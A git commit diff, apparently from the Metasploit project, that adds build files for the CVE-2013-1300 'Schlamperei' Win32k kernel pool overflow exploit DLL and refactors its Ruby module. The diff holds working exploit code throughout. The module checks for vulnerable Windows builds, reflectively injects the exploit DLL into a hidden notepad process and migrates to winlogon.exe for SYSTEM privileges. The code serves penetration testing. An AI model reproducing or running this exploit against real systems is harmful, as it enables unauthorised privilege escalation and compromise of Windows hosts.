Refactoring exploit and adding build files for dll.

bug/bundler_fix
kyuzo 2014-03-12 10:25:52 +00:00
parent 257c121c75
commit 41720428e4
6 changed files with 169 additions and 17 deletions

View File

@ -0,0 +1,20 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-1300", "cve-2013-1300\cve-2013-1300.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.ActiveCfg = Debug|Win32
{C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.Build.0 = Debug|Win32
{C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.ActiveCfg = Release|Win32
{C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -7,13 +7,16 @@
* found and exploited by nils and jon of @mwrlabs * found and exploited by nils and jon of @mwrlabs
*/ */
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c" #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// Purloined from ntstatus.h // Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
#define WIN32_NO_STATUS
#include <windows.h>
#undef WIN32_NO_STATUS
#ifndef _NTDEF_ #ifndef _NTDEF_
typedef __success(return >= 0) LONG NTSTATUS; typedef __success(return >= 0) LONG NTSTATUS;

View File

@ -0,0 +1,96 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{C093C490-61BF-433E-AEB4-80753B20DEC7}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Schlamperei_DLL</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cve-2013-1300.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
<PrecompiledHeaderFile Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeaderFile>
<PrecompiledHeaderOutputFile Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeaderOutputFile>
<PrecompiledHeaderFile Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeaderFile>
<PrecompiledHeaderOutputFile Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeaderOutputFile>
</ClCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

View File

@ -0,0 +1,17 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\cve-2013-1300.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-1300 Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="CVE-2013-1300 is not supported in x64" />
</Target>
</Project>

View File

@ -47,6 +47,13 @@ IF "%ERRORLEVEL%"=="0" (
POPD POPD
) )
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-1300 (schlamperei)"
PUSHD CVE-2013-1300
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
IF "%ERRORLEVEL%"=="0" ( IF "%ERRORLEVEL%"=="0" (
ECHO "Building bypassuac (on-disk)" ECHO "Building bypassuac (on-disk)"
PUSHD bypassuac PUSHD bypassuac

View File

@ -18,16 +18,21 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={}) def initialize(info={})
super(update_info(info, { super(update_info(info, {
'Name' => 'ms13_053_schlamperei', 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
'Description' => %q{ 'Description' => %q{
A kernel pool overflow in Win32k which allows local privilege escalation. Used in pwn2own 2013 to break out of chrome's sandbox. A kernel pool overflow in Win32k which allows local privilege escalation.
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
This allows any unprivileged process to freely migrate to winlogon.exe, achieving
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
NOTE: when you exit the meterpreter session, winlogon.exe is lickely to crash.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Nils&Jon (MWR) - original exploit', 'Nils', #Original Exploit
'Donato Capitella - ported to metasploit', 'Jon', #Original Exploit
'Ben Campbell - ported to metasploit' 'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ;)
], ],
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'Platform' => 'win', 'Platform' => 'win',
@ -58,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Local
def check def check
os = sysinfo["OS"] os = sysinfo["OS"]
if (os =~ /windows/i) == nil unless (os =~ /windows/i)
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
@ -70,7 +75,11 @@ class Metasploit3 < Msf::Exploit::Local
when 7600 when 7600
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
when 7601 when 7601
return Exploit::CheckCode::Vulnerable if revision <= 1800 if branch == 18
return Exploit::CheckCode::Vulnerable if revision < 18176
else
return Exploit::CheckCode::Vulnerable if revision < 22348
end
end end
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
@ -87,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end end
if check != Exploit::CheckCode::Vulnerable unless check == Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
end end
print_status("Launching notepad to host the exploit...") print_status("Launching notepad to host the exploit...")
notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) notepad_process_pid = cmd_exec_get_pid("notepad.exe")
begin begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.") print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Trying to elevate the current process...") print_status("Operation failed. Trying to elevate the current process...")
@ -102,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
end end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...") print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.dll") library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "cve-2013-1300.dll")
library_path = ::File.expand_path(library_path) library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...") print_status("Injecting exploit into #{process.pid}...")
@ -111,8 +120,8 @@ class Metasploit3 < Msf::Exploit::Local
thread = process.thread.create(exploit_mem + offset) thread = process.thread.create(exploit_mem + offset)
client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000) client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)
processes = client.sys.process.get_processes
processes.each do |p| client.sys.process.each_process do |p|
if p['name'] == "winlogon.exe" if p['name'] == "winlogon.exe"
winlogon_pid = p['pid'] winlogon_pid = p['pid']
print_status("Found winlogon.exe with PID #{winlogon_pid}") print_status("Found winlogon.exe with PID #{winlogon_pid}")